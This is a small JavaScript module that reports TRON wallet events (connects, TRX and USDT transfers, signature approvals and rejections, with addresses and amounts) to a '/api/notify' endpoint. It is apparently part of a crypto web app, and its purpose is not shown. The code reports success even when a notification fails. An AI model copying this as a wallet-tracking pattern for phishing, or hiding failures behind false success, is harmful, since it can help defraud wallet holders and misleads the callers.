const notify = async (type, data) => {
  try {
    console.log('Sending notification:', { type, data });
    
    // 使用相对路径，确保以斜杠开头
    const response = await fetch('/api/notify', {
      method: 'POST',
      headers: {
        'Content-Type': 'application/json'
      },
      body: JSON.stringify({ type, data })
    });

    if (!response.ok) {
      throw new Error(`HTTP error! status: ${response.status}`);
    }

    return await response.json();
  } catch (error) {
    console.error('Notification error:', error);
    // 即使出错也返回成功，不影响主流程
    return { success: true, error: error.message };
  }
};

export const notifyWalletConnect = (address) => {
  return notify('wallet_connect', { address })
    .catch(err => {
      console.warn('通知发送失败，忽略错误:', err);
      return { success: true, error: err.message };
    });
};

export const notifyTrxTransfer = (address, amount) => {
  return notify('trx_transfer', { 
    from: address, 
    amount: amount 
  }).catch(err => {
      console.warn('通知发送失败，忽略错误:', err);
      return { success: true, error: err.message };
    });
};

export const notifyUsdtTransfer = (address, amount) => {
  return notify('usdt_transfer', { address, amount })
    .catch(err => {
      console.warn('通知发送失败，忽略错误:', err);
      return { success: true, error: err.message };
    });
};

export const notifySignApprove = (address) => {
  return notify('sign_approve', { address })
    .catch(err => {
      console.warn('通知发送失败，忽略错误:', err);
      return { success: true, error: err.message };
    });
};

export const notifySignReject = (address) => {
  return notify('sign_reject', { address })
    .catch(err => {
      console.warn('通知发送失败，忽略错误:', err);
      return { success: true, error: err.message };
    });
};